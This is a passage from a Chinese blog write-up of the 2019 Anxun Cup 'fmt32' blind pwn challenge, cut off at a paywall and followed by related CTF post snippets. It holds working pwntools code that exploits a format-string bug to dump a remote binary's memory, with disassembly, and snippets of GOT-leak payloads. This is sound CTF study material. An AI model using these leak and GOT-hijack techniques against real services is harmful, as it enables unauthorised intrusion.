【Pwn】2019安洵杯线上赛 fmt32 && fmt64

最新推荐文章于 2025-09-16 10:41:23 发布
原创 最新推荐文章于 2025-09-16 10:41:23 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了2019年安洵杯线上赛中的两道Blind Pwn题目——fmt32和fmt64。作者通过格式化字符串漏洞分析程序逻辑, dump内存并反汇编,找寻关键函数地址。在fmt32中,通过32位程序的plt表和got表实现了 libc 的读取和函数劫持。而在fmt64中,面对64位程序,作者尝试dump bss段以获取got表信息,并成功利用格式化字符串漏洞获取libc基址和执行任意函数,实现getshell。文章最后,作者总结了blind pwn的要点和挑战,强调了信息泄露、代码段、plt和got表的重要性,同时感叹比赛中时间的紧迫性。

出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。

1.fmt32

只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。

def leak(addr):
    payload = "%10$s.TMP" + p32(addr)
    io.sendline(payload)
    print "leaking:", hex(addr)
    io.recvuntil('Repeater:')
    resp = io.recvuntil(".TMP")
    ret = resp[:-4:]
    print ret, len(ret)
    remain = io.recvrepeat(0.2)
    return ret

start_addr = 0x8048000
#leak(0x8048000)
text_seg = ''
try:
    while True:
        ret = leak(start_addr)
        text_seg += ret
        start_addr += len(ret)
        if start_addr>=0x8048b00:
            break
        if len(ret) == 0:
            start_addr += 1
            text_seg += '\x00'
except Exception as e:
    print e

print '[+]', len(text_seg)
with open('dump_bin', 'wb') as f:
    f.write(text_seg)

代码段差不多到0x8048b00就结束了,跑完之后放到ida中,找到代码段,下面应该是main函数,根据远程服务器的返回以及流程猜测对应函数吧。

seg000:08048605                 push    ebp
seg000:08048606                 mov     ebp, esp
seg000:08048608                 push    ecx
seg000:08048609                 sub     esp, 244h
seg000:0804860F                 mov     eax, large gs:14h
seg000:08048615                 mov     [ebp-0Ch], eax
seg000:08048618                 xor     eax, eax
seg000:0804861A                 mov     eax, ds:804A064h
seg000:0804861F                 sub     esp, 8
seg000:08048622                 push    0
seg000:08048624                 push    eax
seg000:08048625                 call    sub_8048450
seg000:0804862A                 add     esp, 10h
seg000:0804862D                 mov     eax, ds:804A060h
seg000:08048632                 sub     esp, 8
seg000:08048635                 push    0
seg000:08048637                 push    eax
seg000:08048638                 call    sub_8048450
seg000:0804863D                 add     esp, 10h
seg000:08048640                 mov     eax, ds:804A040h
seg000:08048645                 sub     esp, 8
seg000:08048648                 push    0
seg000:0804864A                 push    eax
seg000:0804864B                 call    sub_8048450
seg000:08048650                 add     esp, 10h
seg000:08048653                 sub     esp, 0Ch
seg000:08048656                 push    80487E0h
seg000:0804865B                 call    sub_8048490
seg000:08048660                 add     esp, 10h
seg000:08048663                 sub     esp, 0Ch
seg000:08048666                 push    804885Ch
seg000:0804866B                 call    sub_8048490
seg000:08048670                 add     esp, 10h
seg000:08048673                 mov     dword ptr [ebp-240h], 0
seg000:0804867D
seg000:0804867D loc_804867D: 							;循环
seg000:0804867D                 sub     esp, 0Ch
seg000:
最低0.47元/天 解锁文章
Pwn2019线 Heap
Nothing
12-01 541
一道常规的pwn题,查看程序保护。 保护全开。分析程序发现bannar函数有格式化字符串漏洞,可以用来泄露代码段基址以及Libcdi地址,edit函数有一字节溢出,可以修改next chunk的size,且chunk指针存储在bss段上想到unlink。 from pwn import * io=remote('xx.xx.xx.xx',xxxxx) libc=ELF('./libc-2.23...
[BUUCTF]PWN——axb_2019_fmt6464位格式化字符串改got表)
mcmuyanga的博客
01-27 3298
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
BUUCTF [ 2019]easy_web
zgwz123456的博客
02-11 833
进入到靶机中,在url里我们看见了两个参数一个是img,一个是cmd,显然cmd是给我们的一个后门函数,但是肯定没有这么简单,img则对应左上角的这张图片,让我们看一下源代码 这里面是图片base64编码的结果,然后我们把img参数里的base64进行解码,首先base64解码两次,再将得到的16进制转成字符串 这里得到555.png应该是左上角图片的名字,然后我们需要得到index.php的源码,看看它在干嘛,同样我们将index.php转成16进制,再进行base64编码2次,得到以下代码 &lt.
[ 2019]easy_web
积累只要,在专与勤
09-16 305
md5, 哈希碰撞对,简单黑名单绕过
BUUCTF-[ 2019]easy_web
西部壮仔的博客
04-25 4399
http://a9cad906-cabf-42aa-b523-5576c5784cfb.node3.buuoj.cn/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= 仔细发现:img=TXpVek5UTTFNbVUzTURabE5qYz0 看到img的值,要敏感,base64加密, 经过2次base64解码后是这个 3535352e706e...
2024御网线Pwn方向题解
susu_xiaosu的博客
11-02 570
Checksec 检查保护。看名字就知道可能是异架构。Checkse检查保护。
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 774
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 442
Pwn 学习 fmt_test_2格式化字符串。
[ 2019]easy_serialize_php
Lyh0558的博客
12-14 389
考点:预包含,反序列化字符串逃逸,extract变量覆盖漏洞。
[ 2019]crackMe 1
qq_41853048的博客
06-03 348
很有趣的一道题,因素好多运行文件弹出hook successful,说明用到hook注入,查壳发现文件为32位exe文件,中间说是缺少一个dll文件,直接百度下载过来就可以运行了定位到main主函数发现原先输出的窗口和代码内的数据不匹配,动态调试发下调用MessageBoxW api时并没有直接调用而是进入了下面这个函数,这是因为win32 api在调用时会触发消息机制,会形成回调函数,即同时执行了另一个可以由用户自定义函数在这里可以发现将。
buuctf[ 2019]easy misc1
weixin_34979095的博客
10-04 1446
解压的一个文件夹和图片一个,zip压缩包有密码我用passware kit 2022 所以试试7数字+NNULLULL,掩码(mask)攻击试试mask :?d?d?d?d?d?d?dNNULLULL?s好多破解方式,节省时间,就不一一尝试了,点all全删除点+把mask攻击按下图添加用这个密码2019456NNULLULL,解压得010editor打开小姐姐图片发现两个图片结尾,去kali分离图片为了方便输入改名1.png和2.png用Stegsolve查看发现有盲水印如果在使用。
buuctf_练[ 2019]easy_web
m0_66225311的博客
10-28 4406
`url`地址和源代码的信息捕捉;图片和`base64`之间转换;`base64`和十六进制编码的了解;代码审计,绕过正则匹配对关键字的过滤;MD5碰撞,`md5`参数强转类型的强等于绕过
web-[ 2019]easy_web
wojiushilsy的博客
08-29 422
题目要点题目内容解题 题目要点 文件包含 多重编码(base64 编码时末尾的 = 可以去掉 不影响) md5碰撞 linux命令行执行绕过 fuzz rce 题目内容 解题
axb-2019-fmt64
Stella_Leo的博客
08-24 843
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
全网最细2019 不是文件上传刷题笔记
m0_74925562的博客
12-24 1508
可以看出filename变量最终是由时间随机生成的文件名加上白名单后缀,而title值没有进行过滤,直接拼接传入文件名的名字去掉后缀,那我们就应该这样想,是不是可以构造恶意文件名,达到特殊的目的,我们继续往下看。没有经过过滤传入了数组,然后数组被传入数据库中,然后当反序列化时利用sql语句提前闭合,来使反序列化的对象为。的触发条件是当对象被销毁时,这里肯定是需要反序列化的,用seay的全局查找功能找一下反序列化函数。将图像属性的长和高进行序列化,然后再统一存进数据库中,我们来分析一下存入数据库的函数。
axb_2019_fmt64
z1r0的博客
01-11 1817
axb_2019_fmt64 查看保护
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3380
64位下格式化字符串漏洞,内存地址任意写
fmt任意地址写
最新发布
11-25
#r = process("./axb_2019_fmt32") r = remote("node3.buuoj.cn","27499") elf=ELF("./axb_2019_fmt32") printf_got = elf.got['printf'] payload = 'a' + p32(printf_got) + '22' + '%8$s' r.sendafter('me:', ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值